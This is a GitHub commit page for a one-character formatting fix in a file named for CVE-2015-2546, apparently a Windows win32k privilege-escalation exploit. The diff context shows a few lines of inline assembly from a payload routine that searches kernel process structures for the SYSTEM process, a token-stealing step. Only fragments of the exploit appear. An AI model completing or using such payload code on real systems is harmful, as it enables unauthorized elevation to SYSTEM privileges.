Skip to content

Commit

Permalink
Update x86.cpp
Browse files Browse the repository at this point in the history
  • Loading branch information
Leeqwind authored Apr 23, 2018
1 parent bbeedc3 commit b444ca6
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion windows/win32k/CVE-2015-2546/x86.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -446,7 +446,7 @@ xxPayloadWindProc(VOID)
__asm sub ecx, ebx;
__asm jmp LocForSystemPROCESS;

LocFoundSYSTEM :
LocFoundSYSTEM:
__asm mov esi, ecx;

__asm mov eax, dword ptr[edx + 10h];
Expand Down

0 comments on commit b444ca6

Please sign in to comment.